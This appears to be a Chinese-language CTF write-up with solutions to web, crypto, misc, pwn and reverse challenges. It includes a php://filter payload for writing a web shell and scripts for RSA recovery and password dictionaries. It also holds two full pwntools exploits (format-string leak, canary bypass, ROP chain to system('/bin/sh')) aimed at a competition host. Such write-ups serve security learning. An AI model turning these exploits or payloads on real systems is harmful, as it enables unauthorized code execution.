Web
DEAD OR ALIVE
php死亡绕过 php伪协议 url二次编码绕过一下
这里开启了短tag rot47绕不过去
换成
1 2 php://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=upload/shell.php contents=?%3Chp%20phpipfn(o;)%3E?
得到flag
几道菜呀
robotstxt 泄露前半flag
后半flag变量覆盖 吧flag污染到变量world里面
Crypto
codemaster
爆破得到压缩包密码
hint里面看到压缩包密码
听出来摩斯编码
01 0100 0100 011 111 010 101 01 10 100 10 111 0110 0100 01 1011 11 01 101 0 0111 01 1010 101 01 100
001 0100 0100 1000解码得到压缩包密码
1 ALLWORKANDNOPLAYMAKEJACKADULLBOY
得到flag
简单的模运算
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 from Crypto.Util.number import *n1 = 59291291447490366931525634934604732490686993375526804349191888372804657968568621876626267171031639542229776816809231575682674990669907844507573323062869697381007018170369953528533225693260962158277876389797698421883811693774623191453338343873376809325940622690724742325375260783954612111771505452790833107433 e1 = 1009 e2 = 661 c1 = 42985353077188042701858678659683858628193880095538312019081971299029326751867795460043384534976482867850898695817341887974850615883707385265375936859975562647458644154098813749248370155445911231152202411316142174083125556302740642264129017638217154099365335103116579136478977445028803457714891387414804454563 hint2 = 40507463249661310357827794806044375677878316124571340628557074423085821966799760539750240709046644351970536177027127843527257097695964926292300842488261880439240179761636200128317742727421272586463218228015921971356760958631902559531017704907319793768862467740343002694370348402368271531907359292269313167594 hint1 = 1271005879853316066661199285969179445258555468409602536767308127422453124456569166278548456389424001236622134198431700958874184560969387121822195176467698604581027381830540104701755158555395105056691597754287953054854072522855420859550987917092786677237411037800799757596145745139003994853090852244952501770 p=GCD(n1, hint1**e1-e1**(e1*e2)*hint2**e2) m=pow (c1, inverse(65537 , p-1 ),p) print (long_to_bytes(m))n2 = 18907964900655384324579822409386633636878766956056871585535362235214353767231073564264059287914388330411792102199606677008933621408085966756951588469677351070820733406746369679198435269992553170199992317543151904463295431360000467944654613563212110648427484740736780335622922770497302516605477200091994280170659051797483082932715112295285374951466772664058673174457133774539371864037823431076085535646866492867565053211399132137624309571702027870497719709848105717638061824558263209029252939242634210549580025431343041421766587111257036497372428545483704784943228958032869014014563237034417269447643411742587366522581092247139356905151503074118950953726319892565456479517718514001822091970116274032235077283171573739409327260871369017093426482435098823654221146125974831336950435699141428482689352594911360748437075413924102074118643817682988301168832491421799525827632647293700871699768251822202064478207264310344710162587091114198326722398521534722836191900118919600325987668228334387274131745452370144048469165896152934265086085786170745300044244328435656038364921390878141315764940004361350568616343868964642155971232793094529961537868556317288317761237430569785361173933724010332338240102029231307867651913780873895463922404696220328907265969090667253011075715302423364798124784791540343259221981176571491275777227356362593241763735078774750032170810209648159443012857333801615838630780060716065099646497273032317098446052746729617067928763959393487041510168193671378036773409927475705441371588922269531683087325413686315760604906941830110671649667896262119795185372459800672732201403353796496975239081396680894282951703497436899157694531797901273547022181574313676236049710129802224469486290831758140772148263506850711301689866687921384434558768919627058698246307704127709329632785782812326088967419473252484748677712381933762265715476433475653 hint3 = 9939018467626296300864549557153960485816202060115441771858993139956001568094397129213688325169848929397519454556265038265085753791012239390847499832076142790537570688728474176390891119329028306138917962137940523721411683756694953004757356322832322272044727574511946615053360780724964403109981221038321150251912087095566788471973368735984926133539004913163814796547521685779553548417828006578689568287135076606657942555780079060666398892624634539284576783451146414121481315811210373744629102035041262128288541384833388244359092650525684510233998198648220188818529696044589322103131713532522087913277853687802387823370812184861308056607206704924142111163623647400386387795315156552323415775302567837608141240660791558895222250523472575523943334805729177781503647940132538364353380916295244903544529895988952519161034077133368918033027698840291604695794239996491625350827193007237672555853711676946280455422865857083520387962904612732978811244632662722516874510663815000407442709650546583427701935634421822920667340400344464560819496241832753100346158973730178944583819434570015364985334123682718945396012714833234814138060680879946683598382558581755464432848629830671740874556822495651590292355132309556201503702994218748824342270746121842337819752324099307642066174745872761074064496053960340396957873940843698476902239785513353538575271300199803656708789414583304212919858466476111752009816249691548012011325635726932007337584928654763601504911235883280784689919453164650180423494792012285026508211938647974660637499188015435581876228505538395991613265963363970634342709084117396030961729066498695271401095219781344237736883159601430790828530656828799412179649742014177933116928065839153385688599329261957525423958781720021524864279277040500534782586037303978447982579881703150864520067784227584088469267877647284326147128663307302461696049106379396 hint4 = 11497927853957540365332790665731275206952151206861039571536392062632509295957449992678521695139160324432572043863866571073273424766195027066994928026020365890447586873438730677930838694248463784234422970896904779315141100899548415386962349420861970235250438845409060098489028828677789310690303276268227293420117427555062211347687022376226002772552572846005575907377875069559346178573605837280707896716903996273437999304784804469148200034055401729899984732371826562249893238400736560876412526076698397150716407768045925783960626076975474775287357623238930181817744888057241082587725853888247069373763616410186825446631363893872367121719099675878971215427631753890480342562281509217650841316549477101278836516712239644946591434882047908159355119724740895836970093220436696609508084144405957119864577550601265078506824881563233145601502789276574964256487656042156050790935757687533400014492738943377035151940053902285169162559415884261670006407914345470020985548114750984409094762491065523701667910143102554492295526746294891248183460488516919232107982441935261002056298051839186448002917036315086702724337403007094283544108605752353892969499338937456927473502637574082273446631592875576206457590873417790534425052375523311069970894661662935504029122498888677579838832589434264156033809784824308541883139057067073172969579383284214906496081973100504512465134008311849499410830926217663692810810073433508445528894019031624950077917834721653995486872359322444973369269957808220204120434820049177595069822767774880891475045042506316778272385296785381694201967451988353025446019210309412684814041807087081841227290094176745748423008005181412793105824372881451510867905760386180468940263583834371726883151840358399349831450242497969453799407724511831157375792268531837507107779497339624673256413930993867285692700231244480782493119378673295412687014852050209 hint5 = 734693499178140709107482184121639881311481497449164451247514670640712514605734040224535011153519609835276802031782238154113623838563165860055971999265801692161249909520059287311664417036724025637099701450424590923727907132999019020950844342934742235333060614209179570928227493575110697506644022234765949969346518432653798426853947974772328105759741384608693269694 q2=GCD(n2, hint3-hint4) print (q2)p2q2=GCD(n2,hint4-q2-hint3) r=n2//p2q2 print (r)print (long_to_bytes((hint5-1 )//r**2 ))
Misc
大ping特ping
CTF-NetA一把梭
鼠标不妙题
打开后是300个套娃压缩包,写脚本提取
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 import osimport zipfileimport uuidimport shutildef extract_all (zip_path, extract_to, root_directory ): with zipfile.ZipFile(zip_path, 'r' ) as zip_ref: for member in zip_ref.namelist(): filename = os.path.basename(member) if not filename: continue source = zip_ref.open (member) try : target_path = os.path.join(extract_to, str (uuid.uuid4()) + "_" + filename) with source, open (target_path, "wb" ) as target: shutil.copyfileobj(source, target) except RuntimeError: target_path = os.path.join(root_directory, str (uuid.uuid4()) + "_" + filename) with source, open (target_path, "wb" ) as target: shutil.copyfileobj(source, target) def recursive_unzip (directory, root_directory ): for root, dirs, files in os.walk(directory): for file in files: if file.endswith('.zip' ) and not file.endswith('.dic' ): file_path = os.path.join(root, file) extract_to = os.path.join(root, os.path.splitext(file)[0 ]) os.makedirs(extract_to, exist_ok=True ) extract_all(file_path, extract_to, root_directory) recursive_unzip(extract_to, root_directory) if __name__ == "__main__" : start_directory = r"\\?\C:\Users\67300\Downloads\11" recursive_unzip(start_directory, start_directory)
查看python的报错信息和使用everything直接得到最内层的文件
每个压缩包下有一个.dic文件,应该密码就在这300个字典中
写python脚本提取这300个字典
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 import osimport zipfileimport shutilimport tempfiledef extract_zip (zip_path, output_dir ): with zipfile.ZipFile(zip_path, 'r' ) as zip_ref: with tempfile.TemporaryDirectory() as temp_dir: zip_ref.extractall(temp_dir) for root, _, files in os.walk(temp_dir): for file in files: file_path = os.path.join(root, file) if file.endswith('.zip' ): extract_zip(file_path, output_dir) elif file.endswith('.dic' ): shutil.move(file_path, os.path.join(output_dir, file)) print (f'Extracted {file} to {output_dir} ' ) shutil.rmtree(temp_dir) zip_dir = 'C:/Users/67300/Downloads/鼠标不妙题/' output_dir = 'C:/Users/67300/Downloads/鼠标不妙题/111' os.makedirs(output_dir, exist_ok=True ) for filename in os.listdir(zip_dir): if filename.endswith('.zip' ): zip_path = os.path.join(zip_dir, filename) extract_zip(zip_path, output_dir) if filename.endswith('.zip' ): zip_path = os.path.join(zip_dir, filename) extract_zip(zip_path, output_dir)
将300个字典合并成1个,然后跑字典爆破密码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 import osoutput_dir = 'C:/Users/67300/Downloads/鼠标不妙题/111' combined_file_path = 'C:/Users/67300/Downloads/鼠标不妙题/combined.dic' with open (combined_file_path, 'w' , encoding='utf-8' ) as combined_file: for filename in os.listdir(output_dir): if filename.endswith('.dic' ): dic_file_path = os.path.join(output_dir, filename) with open (dic_file_path, 'r' , encoding='utf-8' ) as dic_file: content = dic_file.read() combined_file.write(content) combined_file.write('\n' ) print (f'All .dic files have been combined into {combined_file_path} ' )
看了一下f_几就嵌套几层,可以直接用everything一把梭,找到文件,每个文件是base64的一段
Pwn
book
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 from pwn import *context.update(os = 'linux' , arch = 'amd64' , timeout = 5 ) context.log_level = 'debug' binary = './book' elf = ELF(binary, checksec=False ) DEBUG = 0 if DEBUG: libc = elf.libc p = process(binary) else : libc = ELF('./libc.so.6' , checksec=False ) host = '139.155.126.78' port = '31248' p = remote(host,port) sla = lambda delim, data: p.sendlineafter(delim, data) sa = lambda delim, data: p.sendafter(delim, data) s = lambda data: p.send(data) sl = lambda data: p.sendline(data) ru = lambda delim, **kwargs: p.recvuntil(delim, **kwargs) io = lambda : p.interactive() def cmd (idx ): sla(b">>" , str (idx).encode()) def fmt (payload ): cmd(2 ) sa(b"name:\n" , payload) ru(b"name is:\n" ) def attack (payload ): cmd(3 ) ru(b"write\n" ) s(payload) def pwn (): fmt("%8$p-%19$p-%13$p" ) ru(b"0x" ) codebase = int (p.recvn(12 ), 16 ) - 0x14a0 ru(b"0x" ) libc.address = int (p.recvn(12 ), 16 ) - 0x24083 ru(b"0x" ) canary = int (p.recvn(16 ), 16 ) system = libc.sym["system" ] binsh = next (libc.search(b"/bin/sh" )) success(f"libc: {libc.address:#x} " ) b = codebase + 0x4068 pop_rdi_ret = codebase + 0x0000000000001503 ret = pop_rdi_ret + 1 pay = fmtstr_payload(6 , {b : 0x200 }) fmt(pay) pay = b'a' *0x48 + p64(canary) + p64(0 ) + p64(ret) + p64(pop_rdi_ret) + p64(binsh) + p64(system) attack(pay) io() pwn()
magic_fmt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 from pwn import *context.update(os = 'linux' , arch = 'amd64' , timeout = 5 ) context.log_level = 'debug' binary = './magic_fmt' elf = ELF(binary, checksec=False ) DEBUG = 0 if DEBUG: libc = elf.libc p = process(binary) else : libc = ELF('./libc.so.6' , checksec=False ) host = '139.155.126.78' port = '37023' p = remote(host,port) sla = lambda delim, data: p.sendlineafter(delim, data) sa = lambda delim, data: p.sendafter(delim, data) s = lambda data: p.send(data) sl = lambda data: p.sendline(data) ru = lambda delim, **kwargs: p.recvuntil(delim, **kwargs) io = lambda : p.interactive() def pwn (): ru(b"possess\n" ) pay = b'a' *0xe0 s(pay) ru(b"can " ) ru(b'a' *0xe0 ) ret_addr = u64(p.recvn(6 ).ljust(8 , b'\x00' )) + 0x8 success(f"ret: {ret_addr:#x} " ) ru(b"else?\n" ) pay = p64(ret_addr) s(pay) ru(b"have?\n" ) pay = f"%45$p%{0x68 -14 } c%6$hhn" .encode() s(pay) ru(b"magic:\n" ) ru(b"0x" ) libc.address = int (p.recvn(12 ), 16 ) - 0x29d90 pop_rdi_ret = libc.address + 0x000000000002a3e5 ret = pop_rdi_ret + 1 system = libc.sym["system" ] binsh = next (libc.search(b"/bin/sh" )) success(f"libc: {libc.address:#x} " ) rsp = ret_addr - 0x118 ru(b"possess\n" ) pay = p64(ret_addr) + fit(ret, pop_rdi_ret, binsh, system) s(pay) sa(b"else?" , pay) ru(b"have?\n" ) rbp_offset = 34 pay = f"%{0x8B } c%6$hhn%{(rsp&0xffff ) - 0x8b } c%{rbp_offset} $hn" .encode() s(pay) io() pwn()
Reverse
easy_choice
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 #include <stdio.h> #include <stdlib.h> #define delta 0x9e3779b9 int main () { unsigned int w[8 ] = {0xAC3A28FD , 0x2331590C , 0x329F681B , 0xA6CF62DB , 0x8738A413 , 0x44D27414 , 0xDEF3A4CD , 0x5B22BA91 }; unsigned int v[2 ]; unsigned int key[4 ] = {0x41 ,0x53 ,0x43 ,0x54 }; unsigned int sum; unsigned int y,z,p,rounds,e; int n = 2 ; unsigned int key2[4 ]={0x54 ,0x4f ,0x44 ,0x41 }; for (int o=0 ;o<4 ;o++) { rounds = 6 + 52 /n; v[0 ]=w[2 *o]; v[1 ]=w[2 *o+1 ]; sum = rounds*delta; y = v[0 ]; do { e = sum >> 2 & 3 ; for (p=n-1 ;p>0 ;p--) { z = v[p-1 ]; v[p] -= ((((z>>5 )^(y<<2 ))+((y>>3 )^(z<<4 ))) ^ ((key[(p&3 )^e]^z)+(y ^ sum))); y = v[p]; } z = v[n-1 ]; v[0 ] -= (((key[(p^e)&3 ]^z)+(y ^ sum)) ^ (((y<<2 )^(z>>5 ))+((z<<4 )^(y>>3 )))); y = v[0 ]; sum -= delta; }while (--rounds); rounds = 6 + 52 /n; y = v[0 ]; sum = rounds*delta; do { e = sum >> 2 & 3 ; for (p=n-1 ;p>0 ;p--) { z = v[p-1 ]; v[p] -= ((((z>>5 )^(y<<2 ))+((y>>3 )^(z<<4 ))) ^ ((key2[(p&3 )^e]^z)+(y ^ sum))); y = v[p]; } z = v[n-1 ]; v[0 ] -= (((key2[(p^e)&3 ]^z)+(y ^ sum)) ^ (((y<<2 )^(z>>5 ))+((z<<4 )^(y>>3 )))); y = v[0 ]; sum = sum-delta; }while (--rounds); w[2 *o]=v[0 ]; w[2 *o+1 ]=v[1 ]; } for (int i=0 ;i<8 ;i++) { printf ("%c%c%c%c" ,*((char *)&w[i]+0 ),*((char *)&w[i]+1 ),*((char *)&w[i]+2 ),*((char *)&w[i]+3 )); } return 0 ; }